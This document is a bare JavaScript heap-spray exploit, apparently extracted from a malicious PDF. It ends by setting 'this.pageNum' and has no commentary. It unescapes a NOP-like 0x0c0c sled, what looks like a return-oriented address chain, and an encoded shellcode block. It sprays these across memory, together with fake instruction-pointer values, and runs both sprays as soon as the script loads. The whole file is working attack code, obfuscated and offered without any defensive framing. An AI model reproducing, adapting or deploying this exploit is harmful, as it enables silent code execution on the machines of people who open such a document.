var padding
var bbb, ccc, ddd, eee, fff, ggg, hhh
var pointers_a, i
var x = new Array()
var y = new Array()
function alloc(bytes) {
  return padding.substr(0, (bytes - 6) / 2)
}
function spray_eip(esc_a) {
  pointers_a = unescape(esc_a)
  for (i = 0; i < 2000; i++) {
    x[i] = alloc(8) + pointers_a
    y[i] = alloc(136) + pointers_a
    y[i] = alloc(136) + pointers_a
    y[i] = alloc(136) + pointers_a
  }
}
function spray_shellcode() {
  bbb = unescape(
    '%u0f6a%ufa9d%u0c0c%u0c0c%u0c0c%u0c0c%u6f29%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u6f29%u4a80%u6cef%u4a80%u8861%u97ea%u8861%u97ea%u8861%u97ea%u8861%u97ea%u0000%u0000%u0002%u0000%u0102%u0000%u6f29%u4a80%u3fc1%u0a66%u3fc1%u0a66%u3fc1%u0a66%u3fc1%u0a66%u3fc1%u0a66%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%u63a5%u4a80%u40e8%u199e%u40e8%u199e%u40e8%u199e%u40e8%u199e%u40e8%u199e%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u0000%u0000%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%u9eba%u9cc3%ud9b7%ud9e8%u2474%u5ef4%uc929%u6fb1%u5631%u8312%ufcee%uc803%u7ecd%u0842%uf739%uf0ad%u68ba%u1527%uba8b%u5e53%u0abe%u3217%ue033%ua675%u84c0%uc951%u2261%ue484%u8272%uaa08%u84b1%ub0f4%u66e5%u7bc4%u67f8%u6101%u3af3%ueeda%uaaa6%ub26f%uca7a%ub9bf%ub4c3%u7dba%u0eb7%uadc4%u0468%u558e%u4202%u642f%u90c7%u2f13%u626c%uaee7%ubaa4%u8108%u1188%u2e37%u6b05%u887f%u1ef6%ueb8b%u188b%u9648%uac57%u304d%u1613%uc1b6%uc1f0%ucd3d%u86bd%ud11a%u4a40%ued11%u6dc9%u64f6%u4989%u2dd2%uf349%u8b43%u0c3c%u7393%ua8e0%u91df%ucbf5%ufdbd%ub167%ufd49%u4e1f%u93db%u39b6%u3ffd%u7621%u9975%u79b6%ud4ac%ud247%u4118%u8bef%u57ce%u4d59%u58a8%u46b0%ufdd6%u500a%u5046%u6107%u0338%u35bd%uf3e9%ue129%u6c84%uf26f%u7942%u543f%uaf5c%u0e92%u7d9e%u4b73%ud3cc%u0221%u83a3%u4fad%u0d16%u6f15%ud84c%ue5af%u817f%u7a47%u354c%uf398%u5f53%u539c%u80fe%u3bca%uf88b%u3d6c%ud18c%ubda0%u8e24%u1695%u589d%u9f37%ue339%u4ab8%ud3bc%u6932%udcf4%ue838%ue20a%ue040%u0bda%uf6cb%ucbdc%u5a24%u3423%u8c4b%ufde8%ufd81%u7975%u018f%u129d%uc27e%ub43e%uc0ea%u36aa%uaebb%u5c28%u7839%u7a45%u5ccb%u85da%uf2e1%ub9d4%u4d6c%u3a12%u6958%ub14f%u55d6%uf878%u2126%uaa7b%u1cf7%u5814%u296e%ua306%uaf5b%u2f07%ue849%u0f02%u1ee5%u8f67%u4f52%ucbfa%u637e%u8054%u5616%u8803%u57bc%u577e%uacae%u996a%uc57c%ub3aa%u4704%u6ecc%u6860%uf865%ue344%u7fe6%u2659%u7f92%u39ce%uddd6%u4558%uc9cc%u46f5%uf610%ucd84%u6c81%u1f58%u0970%u3ae2%u398c%u3a19%u4673%ub369%u96fb%u5afe%u8d67%uee9b%u3249%u620b%u4196'
  )
  ccc = unescape('%u0c0c')
  ccc += ccc
  while (ccc.length + 20 + 8 < 65536) {
    ccc += ccc
  }
  i1 = 3048
  ddd = ccc.substring(0, i1 / 2)
  ddd += bbb
  ddd += ccc
  i2 = 65536
  eee = ddd.substring(0, i2 / 2)
  for (; eee.length < 524288; ) {
    eee += eee
  }
  i3 = 2060
  fff = eee.substring(0, 524288 - i3)
  ggg = new Array()
  for (hhh = 0; hhh < 496; hhh++) {
    ggg[hhh] = fff + 's'
  }
}
padding = unescape(
  '%u2915%u2604%u2915%u2604%u2915%u2604%u53c3%u4a84%ube80%ude6f%ube80%ude6f%ube80%ude6f%ube80%ude6f%ube80%ude6f%ube80%ude6f%ube80%ude6f%u0c0c%u0c0c%u4f79%u631e%u4f79%u631e%u4f79%u631e%u4f79%u631e%u4f79%u631e%u4f79%u631e%u4f79%u631e%u4f79%u631e%u4f79%u631e%u4f79%u631e%u4f79%u631e%u4f79%u631e%u4f79%u631e%u4f79%u631e%u4f79%u631e%u4f79%u631e'
)
while (padding.length < 65536) {
  padding = padding + padding
}
spray_shellcode()
spray_eip('%u4141')
this.pageNum = 2
